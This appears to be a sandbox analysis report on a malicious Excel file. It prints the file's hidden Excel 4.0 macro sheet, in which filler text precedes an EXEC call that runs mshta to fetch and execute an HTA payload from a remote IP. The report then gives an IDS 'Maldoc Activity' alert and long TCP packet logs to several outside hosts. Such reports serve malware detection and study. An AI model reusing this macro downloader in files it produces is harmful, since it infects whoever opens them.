                                                                                                                        Macro13False0Falsepost1,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.3,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.5,9,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.6,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.8,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.10,9,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.12,9,' Now eldest new tastes plenty mother called misery get. Longer excuse for county nor except met its things. Narrow enough sex moment desire are. Hold who what come that seen read age its. Contained or estimable earnestly so perceived. Imprudence he in sufficient cultivated. Delighted promotion improving acuteness an newspaper offending he. Misery in am secure theirs giving an. Design on longer thrown oppose am.14,9,' In post mean shot ye. There out her child sir his lived. Design at uneasy me season of branch on praise esteem. Abilities discourse believing consisted remaining to no. Mistaken no me denoting dashwood as screened. Whence or esteem easily he on. Dissuade husbands at of no if disposal.16,9,' Excited him now natural saw passage offices you minuter. At by asked being court hopes. Farther so friends am to detract. Forbade concern do private be. Offending residence but men engrossed shy. Pretend am earnest offered arrived company so on. Felicity informed yet had admitted strictly how you.18,9,=EXEC("cmd /c mshta http://91.240.118.168/zzx/ccv/fe.html")23,9,=HALT()
                                                                                                                        Name:Macro1
                                                                                                                        Type:3
                                                                                                                        Final:False
                                                                                                                        Visible:False
                                                                                                                        Protected:False
                                                                                                                        Macro13False0Falsepre1,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.3,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.5,9,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.6,9,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.8,9,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.10,9,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.12,9,' Now eldest new tastes plenty mother called misery get. Longer excuse for county nor except met its things. Narrow enough sex moment desire are. Hold who what come that seen read age its. Contained or estimable earnestly so perceived. Imprudence he in sufficient cultivated. Delighted promotion improving acuteness an newspaper offending he. Misery in am secure theirs giving an. Design on longer thrown oppose am.14,9,' In post mean shot ye. There out her child sir his lived. Design at uneasy me season of branch on praise esteem. Abilities discourse believing consisted remaining to no. Mistaken no me denoting dashwood as screened. Whence or esteem easily he on. Dissuade husbands at of no if disposal.16,9,' Excited him now natural saw passage offices you minuter. At by asked being court hopes. Farther so friends am to detract. Forbade concern do private be. Offending residence but men engrossed shy. Pretend am earnest offered arrived company so on. Felicity informed yet had admitted strictly how you.18,9,=EXEC("cmd /c mshta http://91.240.118.168/zzx/ccv/fe.html")23,9,=HALT()

                                                                                                                        Network Behavior

                                                                                                                        Snort IDS Alerts

                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                        01/28/22-20:52:27.917165TCP2034631ET TROJAN Maldoc Activity (set)4916680192.168.2.2291.240.118.168

                                                                                                                        Network Port Distribution

                                                                                                                        TCP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Jan 28, 2022 20:52:22.262135029 CET4916580192.168.2.2291.240.118.168
                                                                                                                        Jan 28, 2022 20:52:22.323389053 CET804916591.240.118.168192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:22.323559046 CET4916580192.168.2.2291.240.118.168
                                                                                                                        Jan 28, 2022 20:52:22.327665091 CET4916580192.168.2.2291.240.118.168
                                                                                                                        Jan 28, 2022 20:52:22.388818979 CET804916591.240.118.168192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:22.388957024 CET804916591.240.118.168192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:22.389013052 CET804916591.240.118.168192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:22.389044046 CET4916580192.168.2.2291.240.118.168
                                                                                                                        Jan 28, 2022 20:52:22.389056921 CET4916580192.168.2.2291.240.118.168
                                                                                                                        Jan 28, 2022 20:52:22.389066935 CET804916591.240.118.168192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:22.389107943 CET4916580192.168.2.2291.240.118.168
                                                                                                                        Jan 28, 2022 20:52:22.389117002 CET804916591.240.118.168192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:22.389154911 CET4916580192.168.2.2291.240.118.168
                                                                                                                        Jan 28, 2022 20:52:22.389168978 CET804916591.240.118.168192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:22.389205933 CET4916580192.168.2.2291.240.118.168
                                                                                                                        Jan 28, 2022 20:52:22.389219046 CET804916591.240.118.168192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:22.389259100 CET4916580192.168.2.2291.240.118.168
                                                                                                                        Jan 28, 2022 20:52:22.389267921 CET804916591.240.118.168192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:22.389307976 CET4916580192.168.2.2291.240.118.168
                                                                                                                        Jan 28, 2022 20:52:22.389321089 CET804916591.240.118.168192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:22.389364004 CET4916580192.168.2.2291.240.118.168
                                                                                                                        Jan 28, 2022 20:52:22.389373064 CET804916591.240.118.168192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:22.389415979 CET4916580192.168.2.2291.240.118.168
                                                                                                                        Jan 28, 2022 20:52:22.394378901 CET4916580192.168.2.2291.240.118.168
                                                                                                                        Jan 28, 2022 20:52:27.856393099 CET4916680192.168.2.2291.240.118.168
                                                                                                                        Jan 28, 2022 20:52:27.914995909 CET804916691.240.118.168192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:27.915090084 CET4916680192.168.2.2291.240.118.168
                                                                                                                        Jan 28, 2022 20:52:27.917165041 CET4916680192.168.2.2291.240.118.168
                                                                                                                        Jan 28, 2022 20:52:27.975740910 CET804916691.240.118.168192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:27.975884914 CET804916691.240.118.168192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:27.975898981 CET804916691.240.118.168192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:27.975997925 CET4916680192.168.2.2291.240.118.168
                                                                                                                        Jan 28, 2022 20:52:28.087431908 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.087475061 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.087532997 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.098078966 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.098098040 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.162380934 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.162540913 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.175158024 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.175182104 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.175945044 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.381906033 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.382057905 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.464514017 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.505896091 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.517829895 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.517898083 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.517956972 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.518073082 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.518110037 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.518198013 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.518311977 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.518357038 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.518430948 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.518441916 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.518452883 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.518467903 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.518865108 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.540488958 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.540565014 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.540652990 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.540689945 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.540716887 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.540724993 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.540889025 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.540952921 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.540970087 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.540992022 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.541009903 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.541212082 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.541444063 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.541512012 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.541531086 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.541543961 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.541560888 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.541877031 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.562359095 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.562431097 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.562530994 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.562567949 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.562589884 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.562594891 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.562597990 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.562652111 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.562661886 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.562680006 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.562720060 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.562982082 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.563046932 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.563106060 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.563106060 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.563122988 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.563153028 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.563436985 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.563494921 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.563493967 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.563512087 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.563548088 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.563601017 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.563935041 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.563987017 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.563994884 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.564012051 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.564054966 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.564429998 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.564486027 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.564486980 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.564502001 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.564536095 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.564809084 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.564981937 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.565040112 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.565042019 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.565056086 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.565098047 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.565964937 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.584345102 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.584425926 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.584517956 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.584537029 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.584575891 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.584598064 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.584665060 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.584669113 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.584686041 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.584732056 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.584842920 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.584913015 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.584913969 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.584930897 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.584973097 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.585031986 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.585125923 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.585196972 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.585199118 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.585216045 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.585268021 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.585413933 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.585489035 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.585508108 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.585577011 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.585705042 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.585776091 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.585777044 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.585813046 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.585870028 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.585995913 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.586066008 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.586086988 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.586100101 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.586138010 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.586229086 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.586230993 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.586249113 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.586297989 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.586303949 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.586322069 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.586370945 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.586472988 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.586549997 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.586550951 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.586568117 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.586611986 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.587639093 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.587719917 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.587745905 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.587759018 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.587800980 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.588675976 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.611224890 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.611308098 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.611363888 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.611377954 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.611394882 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.611401081 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.611516953 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.611584902 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.611598015 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.611618996 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.611675024 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.611689091 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.611757040 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.611859083 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.611918926 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.611933947 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.611960888 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.611989021 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.612131119 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.612138033 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.612152100 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.612194061 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.612215996 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.612268925 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.612282038 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.612390041 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.612449884 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.612463951 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.612483978 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.612529993 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.612544060 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.612559080 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.612674952 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.612721920 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.612732887 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.612756968 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.612807989 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.612827063 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.612915039 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.612967014 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.612979889 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.613004923 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.613051891 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.613076925 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.613089085 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.613167048 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.613219976 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.613233089 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.613259077 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.613270998 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.613317966 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.613328934 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.613363981 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.613409996 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.613423109 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.613441944 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.613491058 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.613502026 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.613775969 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.613970041 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.618294954 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.618382931 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.618422985 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.618483067 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.634390116 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.634442091 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.634514093 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.634526014 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.634527922 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.634541035 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.634582996 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.634593964 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.634618044 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.634623051 CET4434916794.130.116.76192.168.2.22
                                                                                                                        Jan 28, 2022 20:52:28.634659052 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:28.637803078 CET49167443192.168.2.2294.130.116.76
                                                                                                                        Jan 28, 2022 20:52:32.352492094 CET4916580192.168.2.2291.240.118.168
                                                                                                                        Jan 28, 2022 20:53:32.987611055 CET804916691.240.118.168192.168.2.22
                                                                                                                        Jan 28, 2022 20:53:32.987729073 CET4916680192.168.2.2291.240.118.168
                                                                                                                        Jan 28, 2022 20:53:48.802997112 CET4916880192.168.2.22160.16.102.168
                                                                                                                        Jan 28, 2022 20:53:49.105958939 CET8049168160.16.102.168192.168.2.22
                                                                                                                        Jan 28, 2022 20:53:49.106144905 CET4916880192.168.2.22160.16.102.168
                                                                                                                        Jan 28, 2022 20:53:49.188121080 CET4916880192.168.2.22160.16.102.168
                                                                                                                        Jan 28, 2022 20:53:49.491300106 CET8049168160.16.102.168192.168.2.22
                                                                                                                        Jan 28, 2022 20:53:49.509098053 CET8049168160.16.102.168192.168.2.22
                                                                                                                        Jan 28, 2022 20:53:49.509155989 CET8049168160.16.102.168192.168.2.22
                                                                                                                        Jan 28, 2022 20:53:49.509185076 CET4916880192.168.2.22160.16.102.168
                                                                                                                        Jan 28, 2022 20:53:49.509213924 CET4916880192.168.2.22160.16.102.168
                                                                                                                        Jan 28, 2022 20:53:49.516428947 CET4916880192.168.2.22160.16.102.168
